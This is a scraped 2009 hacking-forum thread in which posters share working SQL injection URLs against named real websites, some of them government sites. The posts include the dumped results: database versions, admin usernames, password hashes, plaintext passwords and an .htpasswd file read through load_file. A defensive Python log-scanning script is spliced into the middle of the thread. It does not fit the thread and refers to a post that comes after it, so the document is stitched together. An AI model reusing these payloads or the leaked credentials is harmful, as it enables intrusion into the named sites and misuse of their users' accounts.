SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. farex

    farex Banned

    Joined:
    11 Mar 2009
    Messages:
    213
    Likes Received:
    85
    Reputations:
    6
    http://www.claimscompensation.com

    http://www.claimscompensation.com/news.php?id=1+union+select+1,concat_ws(0x3a,vUser,vPassword,vAdmin_email),3,4,5,6,7,8,9,0+from+admin--

    database version 5.0.67.d7
    database_name - ccb_cms

    vUser - admin
    vPassword -ccb
    vAdmin_email - [email protected]
     
    #8281 farex, 14 Mar 2009
    Last edited: 14 Mar 2009
  2. hookman

    hookman Member

    Joined:
    16 Feb 2009
    Messages:
    44
    Likes Received:
    10
    Reputations:
    0
    Code:
    http://www.anitaroddick.com/readmore.php?sid=-44+union+select+1,2,3,convert((username)+using+latin1),convert((user_password)+using+latin1),6,7,8,9+from+users--
    all the users are laid out in plain view ;)
     
  3. hookman

    hookman Member

    Joined:
    16 Feb 2009
    Messages:
    44
    Likes Received:
    10
    Reputations:
    0
    Code:
    http://www.lrwc.org/pub2.php?sid=-999+union+select+1,concat(version(),0x3b,database(),0x3b,user()),3,4,5,6,7,8--
    4.0.27-log
     
    1 person likes this.
  4. Cennarios

    Cennarios Elder

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    http://www.poster.by/main.php?cat=-1)+union+select+concat_ws(0x3a3a,email,login,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+users+limit+20,1/*

    No comments
     
    1 person likes this.
  5. hookman

    hookman Member

    Joined:
    16 Feb 2009
    Messages:
    44
    Likes Received:
    10
    Reputations:
    0
    Code:
    http://www.unimerco.com/index.php?mid=99+union+select+1,2,3,4,version(),6,7,8/*
    4.0.18-standard-log
     
  6. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.cautis.ro/ro/index.php?id=10077+AND+ASCII(SUBSTRING((select+y=1...3() ),1,1)>x&lang=ro

    y1=version
    y2=database
    y3=user

    x1=52,46,49,46,50,48,45,108,111,103
    x2=99,97,117,116,105,115
    x3=99,97,117,116,105,115,64,108,111,99,97,108,104,111,115,116


    Version : 4.1.20-log
    Database : cautis
    User : cautis@localhost
     
    2 people like this.
  7. f1ng3r

    f1ng3r [forgotten regiment]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    Code:
    http://www.parktime.ru/index.php?razdel=article&id_article=-1+union+select+concat_ws(0x3a,version(),database(),user()),2--
    Database Version : 4.1.22
    Database name : parktime_db_main
    User name : [email protected]


    admin:

    Code:
    http://www.parktime.ru/index.php?razdel=article&id_article=-1+union+select+concat_ws(0x3a,login,password),2+from+users--
    Code:
    admin:65d9468e73f95afaeb578d5312d577f4
     
  8. ph1l1ster

    ph1l1ster Elder

    Joined:
    11 Mar 2008
    Messages:
    396
    Likes Received:
    153
    Reputations:
    19
    www.litexplus.md

    Database Version: 5.0.24a
    Database name: litexplus
    User name: root@localhost


    Code:
    http://www.litexplus.md/articles.php?id=5+union+select+1,concat(login,0x3a,pass)+from+users
    admin:25e4ee4e9229397b6b17776bfceaf8e7:adminpass

    Code:
    http://www.litexplus.md/swadmin
    file_priv Y

    Code:
    http://www.litexplus.md/articles.php?id=5+union+select+1,load_file(0x2f686f6d652f7777772f6c69746578706c75732e6d642f737761646d696e2f2e6874706173737764)
    frik:rmlqmtXgO9.rc:111


    Code:
    http://www.litexplus.md/sql
     
  9. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    2diznt
    You should check the anti-repost thread first.....



    5.0.67-community:halyava_admin@localhost:halyava_catalog
     
    1 person likes this.
  10. f1ng3r

    f1ng3r [forgotten regiment]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    Code:
    http://www.acorn-sb.ru/read.php?nid=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6--
    Database Version : 4.0.26
    Database name : acorn_sbru
    User name : [email protected]


    ------------------------------------------------------+

    Code:
    http://www.slavich.ru/?id=3&aid=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7--
    Database Version : 5.0.32-Debian_7etch5-log
    Database name : slavich
    User name : slavich@localhost
     
    1 person likes this.
  11. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    Czechia . ru - all about Czechia
    Code:
    http://www.czechia.ru/firms/index.html?id=-14+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(user(),0x3a,database(),0x3a,version()),15,16,17--
    user(): [email protected]
    database(): amigo-tours
    version(): 4.0.27-log

    PR=3
     
  12. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.autofavorit.ro/chestionare.php?numar=-19+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10/*


    Database Version: 4.1.22-standard
    Database name: auto_all
    User name: auto_admin@localhost
     
  13. ph1l1ster

    ph1l1ster Elder

    Joined:
    11 Mar 2008
    Messages:
    396
    Likes Received:
    153
    Reputations:
    19
    Code:
    http://www.warcraftparadise.com/articles.php?id=-13+union+select+1,concat(user(),0x3a,version()),3,4,5,6,7,8,9/*
    Database Version: 4.1.22-standard
    Database name: warcraft_articles
    User name: warcraft_user@localhost

    Code:
    http://www.teplovod.ru/articles.php?id=13+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14
    Database Version: 5.0.24-standard
    Database name: db_teplovod2
    User name: teplovod2@localhost
     
  14. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://www.md-tuning.de/Felge-ALU-Winter-Dotz-Imola-Focus-I-Typ-DAW-DBW-DNW.php?Rubrik=Reifen&ID=-21095+union+select+1,2,version(),4,5,6,7,8,9,10,11,12&tuning=tuning
    4.0.24
     
    _________________________
    1 person likes this.
  15. ph1l1ster

    ph1l1ster Elder

    Joined:
    11 Mar 2008
    Messages:
    396
    Likes Received:
    153
    Reputations:
    19
    Code:
    http://www.arthobbs.com/articles.php?Submit=view&id=13+union+select+1,concat(version(),0x3a,user()),3,4,5
    Database Version: 5.0.67-community
    Database name: arthobbs_art
    User name: arthobbs_site@localhost

    Code:
    http://www.perio.com.ua/articles.php?id=-13+union+select+1,concat(version(),0x3a,user()),3,4,5,6
    Database Version: 5.0.41-community-log
    Database name: indianem_yana_db
    User name: indianem_yana@localhost

    Code:
    http://www.leannashville.com/fitness_health/articles.php?ID=-13+union+select+1,2,concat(username,0x3a,password),4,5,6+from+users
    Database Version: 5.0.67-log
    Database name: lean_db
    User name: [email protected]

    Code:
    http://www.eoe-tata.com/articles.php?id=-13+union+select+1,concat(login,0x3a,pass)+from+admins
    Database Version: 5.0.67-log
    Database name: eoetata
    User name: [email protected]
     
    1 person likes this.
  16. farex

    farex Banned

    Joined:
    11 Mar 2009
    Messages:
    213
    Likes Received:
    85
    Reputations:
    6
    http://tempgun.ru

    database: 5.0.67
    name_datebase: tempgun_1

    Login: admin
    Pass: 12345
    IP: 82.142.140.130

    http://tempgun.ru/admin
     
    1 person likes this.
  17. f1ng3r

    f1ng3r [forgotten regiment]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    Code:
    http://www.astrainfo.ru/cataloque.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4--
    Database Version : 4.0.26
    Database name : wwwastrainforu
    User name : [email protected]


    admins:


    Code:
    http://www.astrainfo.ru/cataloque.php?id=-1+union+select+1,concat_ws(0x3a,login,passwd),3,4+From+users--
    Code:
    astra:astra0311
    perfex:perf0410
    baltm_rostov:balt0610
    servico:serv0311
    bsv:bsv1912
     
    2 people like this.
  18. fedi

    fedi New Member

    Joined:
    13 Mar 2009
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    http://darkomen.ru/?go=19&indx=1304+union+select+1,2,@@version,4,5,6,7,8,9,0,11,12--
    Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
    http://darkomen.ru/?go=19&indx=1304+union+select+1,2,user_name(n),4,5,6,7,8,9,0,11,12--
    Users: public,dbo,guest, dumped via user_name(n) for n=0,1,2
    Iterating n through DB_NAME(n) I also found
    http://darkomen.ru/?go=19&indx=1304+union+select+1,2,DB_NAME(n),4,5,6,7,8,9,0,11,12-- for n=1....10
    1)master
    2)tempdb
    3)model
    4)msdb
    5)lin2db
    6)lin2comm
    7)l2gloss
    8)lin2world
    9) lin2log
    10)lin2clancomm
     
    1 person likes this.
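As an added defender-side example (not code from any poster in this thread), the following Python script flags the payload shapes that recur across these posts in web-server access logs: UNION SELECT column probing with version()/database()/user() fingerprinting, load_file() reads, the boolean-blind ASCII(SUBSTRING(...)) probes from Gorev's post, and the MSSQL user_name(n)/DB_NAME(n) enumeration from fedi's post. Each request URL is normalized the way the database effectively sees it (percent-decoding, `+` to space, `/**/` comments to whitespace) before matching, so the `/**/`-spaced variant from Rubaka's post is caught too. The log lines, client IPs and paths are constructed placeholders.

```python
"""Flag SQL-injection payload shapes in combined-format access logs.

Added example for this thread; not code from any poster. Sample log lines,
IP addresses and paths below are constructed placeholders.
"""
import re
from urllib.parse import unquote_plus

# (rule name, pattern) over the normalized query string. The shapes mirror
# the payloads seen in the thread: UNION SELECT probing, DB fingerprinting
# functions, load_file() reads, boolean-blind ASCII(SUBSTRING()) comparisons,
# and MSSQL user_name(n) / DB_NAME(n) enumeration.
RULES = [
    ("union_select", re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I)),
    ("db_fingerprint", re.compile(r"\b(?:version|database|user)\s*\(\s*\)|@@version", re.I)),
    ("file_read", re.compile(r"\bload_file\s*\(", re.I)),
    ("blind_ascii_probe", re.compile(r"\bascii\s*\(\s*substring\s*\(", re.I)),
    ("mssql_enum", re.compile(r"\b(?:user_name|db_name)\s*\(\s*\d+\s*\)", re.I)),
]

# Inline comments are a common whitespace substitute (UNION/**/SELECT).
COMMENT_RE = re.compile(r"/\*.*?\*/")

# Apache/nginx combined log format, enough fields for this example.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)


def normalize_query(raw_query: str) -> str:
    """Decode a query string as the backend will: percent-decode, '+' -> space,
    collapse /**/ comments to a space, squeeze whitespace."""
    text = unquote_plus(raw_query)
    text = COMMENT_RE.sub(" ", text)
    return re.sub(r"\s+", " ", text).strip()


def classify_request(url: str) -> list:
    """Return the names of every rule matching the URL's query string."""
    _, _, query = url.partition("?")
    if not query:
        return []
    normalized = normalize_query(query)
    return [name for name, pattern in RULES if pattern.search(normalized)]


def scan_log(lines) -> list:
    """Return (client ip, url, matched rules) for each request that hits a rule."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash
        hits = classify_request(m.group("url"))
        if hits:
            findings.append((m.group("ip"), m.group("url"), hits))
    return findings


# Constructed sample log lines (placeholder IPs from RFC 5737 ranges).
SAMPLE_LOG = [
    '203.0.113.5 - - [14/Mar/2009:10:01:02 +0300] "GET /news.php?id=1 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [14/Mar/2009:10:01:09 +0300] "GET /news.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4-- HTTP/1.1" 200 4880',
    '203.0.113.5 - - [14/Mar/2009:10:01:15 +0300] "GET /articles.php?id=5+union+select+1,load_file(0x2f746d702f74657374) HTTP/1.1" 200 4910',
    '198.51.100.7 - - [14/Mar/2009:10:02:30 +0300] "GET /index.php?id=10077+AND+ASCII(SUBSTRING((select+version()),1,1))>52 HTTP/1.1" 200 7700',
    '198.51.100.7 - - [14/Mar/2009:10:03:01 +0300] "GET /static.php?pid=-1/**/UNION/**/SELECT/**/1,2,3/**//* HTTP/1.1" 200 3300',
    '192.0.2.9 - - [14/Mar/2009:10:04:11 +0300] "GET /?go=19&indx=1304+union+select+1,2,DB_NAME(5),4-- HTTP/1.1" 500 1200',
]

if __name__ == "__main__":
    for ip, url, hits in scan_log(SAMPLE_LOG):
        print(f"{ip}  {', '.join(hits)}  {url}")
```

Run over real logs by replacing `SAMPLE_LOG` with an iterator over the file; pair the hits with the response status, since a 200 on a `union select` probe (as opposed to a 500) is the stronger signal that the injection produced output.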
  19. Rubaka

    Rubaka Elder

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    http://www.tathaastumag.com/static.php?pid=-1/**/UNION/**/SELECT/**/1,2,3/**//*

    Database Version: 4.1.22
    Database name: tathaastumag
    User name: tathaastumag@web535
     
    1 person likes this.
  20. ПаВлУшКа

    ПаВлУшКа New Member

    Joined:
    7 Feb 2009
    Messages:
    24
    Likes Received:
    4
    Reputations:
    0
    Code:
    http://www.conadel.gob.sv/noticia.php?id=-11+union+select+1,version(),3,4,5,6,7,8,9,10--
    Code:
    http://www.coes.org.sv/noticias.php?id=-232+union+select+version(),2,3,4,5--
    Code:
    http://www.mangoymar.com/eng/hotels_view.php?id=-2+union+select+1,2,3,version(),5,6,7,8--
     